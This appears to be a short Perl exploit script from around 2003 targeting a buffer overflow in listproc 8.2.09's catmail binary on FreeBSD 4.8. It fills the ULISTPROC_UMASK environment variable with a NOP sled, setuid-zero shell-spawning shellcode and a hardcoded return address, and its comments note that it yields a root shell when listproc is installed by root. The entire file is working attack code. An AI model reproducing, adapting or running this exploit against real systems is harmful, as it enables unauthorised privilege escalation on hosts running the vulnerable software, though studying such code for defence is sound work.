#!/usr/bin/perl -w
# DSR-listproc.pl - kokaninATdtors.net vs. listproc 8.2.09 (bug found by KF)
# as per http://www.packetstormsecurity.nl/0305-advisories/srt2003-1137.txt
# offset, retaddr and shellcode is for my FreeBSD 4.8-RELEASE, YMMV
# shellcode by eSDee, hello there eSDee
# dont forget to edit the path to the catmail binary
# this yields uid(0) if listproc is installed by root, otherwise something else

$len = 16534;
$ret = pack("l",0xbfbfd176); # appx. middle of the env_var (as seen w. ½ eye)
$nop = "\x90";                                        
$shellcode =    "\x31\xc0\x50\x50\xb0\x17\xcd\x80\x31\xc0\x50\x68".
                "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50".
                "\x54\x53\x50\xb0\x3b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";
                                                      
for ($i = 0; $i < $len - (length($shellcode)-8); $i++) {
    $buffer .= $nop;                                  
}                                                     
$buffer .= $shellcode;                                
$buffer .= $ret x 2;                                  
local($ENV{'ULISTPROC_UMASK'}) = $buffer;             
system("catmail");